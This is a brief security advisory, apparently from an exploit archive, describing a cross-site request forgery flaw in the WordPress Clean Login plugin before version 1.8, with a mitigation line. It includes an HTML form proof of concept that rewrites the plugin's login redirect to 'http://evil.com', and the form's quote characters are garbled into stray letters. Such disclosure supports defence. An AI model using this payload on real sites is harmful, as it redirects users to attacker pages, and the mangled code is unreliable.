WordPress Clean Login Cross Site Request Forgery

WordPress Clean Login plugin versions prior to 1.8 suffer from a cross site request forgery vulnerability.

MD5 | d394c043b0c71f8bc31e0732dcfb0921


Software Description


Software:clean login


description:Responsive Frontend Login and Registration plugin.




CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.




<form method="POST" action="">

<input type="text" name= "adminbar" value=aon">

a<input type="text" name="emailnotificationcontent" value="">
a<input type="text" name="termsconditionsMSG" value="">
a<input type="text" name="termsconditionsURL" value="">
a<input type="text" name="urlredirect" value=ahttp://>
a<input type=atexta name="loginredirecta value=aona>
a<input type=atexta name="loginredirect_urla value="http://evil.coma>
a<input type=atexta name="logoutredirect_urla value=">
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>
a<input type=atexta name="Submita value="Save Changesa>
<input type="submita>





Disable the plugin until a new version is released that fixes this bug.




https://wordpress.org/plugins/clean-login/#developers(1.8 version update)

Related Posts